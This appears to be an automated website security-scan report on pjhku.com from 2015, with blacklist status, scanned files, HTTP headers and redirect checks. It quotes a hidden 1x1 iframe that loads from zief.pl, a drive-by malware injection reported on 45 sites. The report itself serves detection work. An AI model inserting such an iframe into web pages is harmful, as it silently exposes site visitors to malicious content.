Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pjhku.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://pjhku.com/ | 200 OK Content-Length: 148805 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"16"},"slide":{"type":"slide","bdImg":"7","bdPos":"left","bdTop":"67"}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)]; Antivirus reports:
Hidden iFrame found. The same iFrame was found in 45 websites. size: 1x1 src: http://zief.pl/rc/ <iframe src="http://zief.pl/rc/" width=1 height=1 style="border:0"> | ||
http://images.sohu.com/cs/jsfile/js/c.js | 200 OK Content-Length: 49320 Content-Type: application/x-javascript | clean |
http://tcss.qq.com/ping.js?v=1off | 200 OK Content-Length: 8909 Content-Type: application/x-javascript | clean |
http://pjhku.com/home.php?mod=misc&ac=sendmail&rand=1420721724 | 200 OK Content-Length: 0 Content-Type: text/javascript | clean |
http://discuz.gtimg.cn/cloud/scripts/discuz_tips.js?v=1 | 200 OK Content-Length: 6173 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/i.js | 200 OK Content-Length: 39128 Content-Type: application/x-javascript | clean |
http://pjhku.com/test404page.js | 404 Not Found Content-Length: 4732 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pjhku.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 12:55:24 GMT
Server: Microsoft-IIS/8.0
Content-Length: 148805
Content-Type: text/html; charset=gbk
Set-Cookie: qxtj_2132_saltkey=YL2TubBp; expires=Sat, 07-Feb-2015 12:55:24 GMT; path=/; httponly
Set-Cookie: qxtj_2132_lastvisit=1420718124; expires=Sat, 07-Feb-2015 12:55:24 GMT; path=/
Set-Cookie: qxtj_2132_sid=tQ5Qxe; expires=Fri, 09-Jan-2015 12:55:24 GMT; path=/
Set-Cookie: qxtj_2132_lastact=1420721724%09forum.php%09; expires=Fri, 09-Jan-2015 12:55:24 GMT; path=/
Set-Cookie: qxtj_2132_stats_qc_reg=deleted; expires=Wed, 08-Jan-2014 12:55:23 GMT; path=/
Set-Cookie: qxtj_2132_cloudstatpost=deleted; expires=Wed, 08-Jan-2014 12:55:23 GMT; path=/
Set-Cookie: qxtj_2132_onlineusernum=472; expires=Thu, 08-Jan-2015 13:00:24 GMT; path=/
Set-Cookie: qxtj_2132_sid=tQ5Qxe; expires=Fri, 09-Jan-2015 12:55:24 GMT; path=/
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
...148805 bytes of data.
GET / HTTP/1.1
Host: pjhku.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 08 Jan 2015 12:55:24 GMT
Server: Microsoft-IIS/8.0
Content-Length: 148805
Content-Type: text/html; charset=gbk
Set-Cookie: qxtj_2132_saltkey=YL2TubBp; expires=Sat, 07-Feb-2015 12:55:24 GMT; path=/; httponly
Set-Cookie: qxtj_2132_lastvisit=1420718124; expires=Sat, 07-Feb-2015 12:55:24 GMT; path=/
Set-Cookie: qxtj_2132_sid=tQ5Qxe; expires=Fri, 09-Jan-2015 12:55:24 GMT; path=/
Set-Cookie: qxtj_2132_lastact=1420721724%09forum.php%09; expires=Fri, 09-Jan-2015 12:55:24 GMT; path=/
Set-Cookie: qxtj_2132_stats_qc_reg=deleted; expires=Wed, 08-Jan-2014 12:55:23 GMT; path=/
Set-Cookie: qxtj_2132_cloudstatpost=deleted; expires=Wed, 08-Jan-2014 12:55:23 GMT; path=/
Set-Cookie: qxtj_2132_onlineusernum=472; expires=Thu, 08-Jan-2015 13:00:24 GMT; path=/
Set-Cookie: qxtj_2132_sid=tQ5Qxe; expires=Fri, 09-Jan-2015 12:55:24 GMT; path=/
X-Powered-By: PHP/5.2.17
X-Powered-By: ASP.NET
...148805 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: pjhku.com
Referer: http://www.google.com/search?q=pjhku.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pjhku.com
Referer: http://www.google.com/search?q=pjhku.com
Result:
The result is similar to the first query. There are no suspicious redirects found.